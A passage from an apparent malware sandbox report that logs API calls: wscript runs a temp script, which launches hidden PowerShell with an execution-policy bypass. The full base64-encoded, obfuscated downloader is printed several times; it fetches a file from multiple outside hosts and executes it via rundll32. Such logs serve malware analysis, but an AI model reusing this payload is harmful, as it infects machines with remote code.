gAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA=="
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: wscript
parameters: "C:\Users\test22\AppData\Local\Temp\Azpq.js" Pinbrain AlphanumericBristles hyperbarbarismPhenazine
filepath: wscript
1 1 0

CreateProcessInternalW

thread_identifier: 2380
thread_handle: 0x0000033c
process_identifier: 2384
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA=="
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000344
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2